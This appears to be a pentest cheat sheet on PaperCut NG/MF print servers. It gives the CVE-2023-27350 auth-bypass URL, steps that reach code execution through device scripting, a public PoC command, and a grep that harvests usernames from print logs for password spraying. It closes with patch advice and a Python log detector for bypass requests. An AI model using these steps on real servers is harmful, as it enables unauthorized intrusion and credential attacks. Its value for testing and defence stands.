PaperCut NG/MF
Print-management server, admin UI on 9191/9192. Print logs leak usernames for spraying, and CVE-2023-27350 is an unauthenticated auth bypass that reaches the scripting engine for RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
| 9191 | tcp | PaperCut admin/user web (HTTP) |
| 9192 | tcp | PaperCut web (HTTPS) |
Fingerprint
- 'PaperCut MF' / 'PaperCut NG' login at /app, version in the footer
Key files
| Path | Holds | Sensitive |
|---|---|---|
| server/logs/ | print job logs — usernames, document names | sensitive |
| server/data/internal.db | internal user accounts/hashes | sensitive |
Default / weak creds
admin is the default built-in account
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2023-27350 | Unauthenticated auth bypass → RCE via the built-in scripting (SetupCompleted) |
| CVE-2019-8903 | Unauthenticated access to admin pages |
Exploitation primitives
- Harvest usernames from print logs, then password-spray AD with them
- CVE-2023-27350: bypass login via /app?service=page/SetupCompleted, enable 'User/Group Sync' or device scripting, run a command as the PaperCut service account
Overview
PaperCut manages printing; its admin console sits on 9191. On a box it’s useful in two ways: the print logs leak usernames (great for spraying) and CVE-2023-27350 bypasses auth straight to RCE.
Auth bypass → RCE (CVE-2023-27350)
Walk through the setup-wizard bypass to land in the admin console:
```
http://<TARGET>:9191/app?service=page/SetupCompleted
```
Then enable Options → Advanced → Enable external user lookup / device scripting and trigger a script that runs as the PaperCut service user (often SYSTEM on Windows). A public PoC automates it:
```bash
python3 CVE-2023-27350.py --url http://<TARGET>:9191 --cmd "cmd /c whoami"
```
Harvest usernames
Read the print logs for valid account names to spray:
```bash
ls server/logs/ && grep -hoE '[a-z]+\.[a-z]+' server/logs/*.csv | sort -u
```
Hardening
Patch to ≥ 20.1.7 / 21.2.11 / 22.0.9, restrict the admin port, and don’t expose print logs.
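A detection check to pair with restricting the admin port: the SetupCompleted request is an ordinary GET, so it is visible in any access log written in front of 9191/9192. This is an added example, not part of the original page or of PaperCut; it assumes a reverse proxy writing combined-format access logs, and the admin network in `ADMIN_NETS` and the sample lines are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: networks allowed to reach the admin console (constructed value).
ADMIN_NETS = [ipaddress.ip_network("10.10.50.0/24")]

# Combined log format prefix: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_setup_completed(target):
    """True if the request target asks /app for the SetupCompleted page."""
    parts = urlsplit(target)
    # Servlet containers may append ;jsessionid=... to the path.
    if parts.path.split(";")[0].rstrip("/") != "/app":
        return False
    # parse_qs percent-decodes, so page%2FSetupCompleted matches; compare case-insensitively.
    services = parse_qs(parts.query).get("service", [])
    return any(s.lower() == "page/setupcompleted" for s in services)

def outside_admin_nets(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True  # unparsable client field: report it rather than skip it
    return not any(addr in net for net in ADMIN_NETS)

def find_bypass_requests(lines):
    """Return (ip, timestamp, status) for SetupCompleted hits from outside ADMIN_NETS."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m and is_setup_completed(m["target"]) and outside_admin_nets(m["ip"]):
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '10.10.50.7 - - [12/May/2023:09:01:11 +0000] "GET /app HTTP/1.1" 200 5120',
    '198.51.100.23 - - [12/May/2023:09:14:02 +0000] "GET /app?service=page/SetupCompleted HTTP/1.1" 200 3311',
    '198.51.100.23 - - [12/May/2023:09:14:05 +0000] "GET /app?service=page%2FSetupCompleted HTTP/1.1" 200 3311',
    '10.10.50.7 - - [12/May/2023:10:30:40 +0000] "GET /app?service=page/SetupCompleted HTTP/1.1" 200 3311',
]

if __name__ == "__main__":
    print(find_bypass_requests(SAMPLE_LOG))
```

On a server that finished setup long ago, any hit from outside the admin range is worth triage regardless of the status code returned.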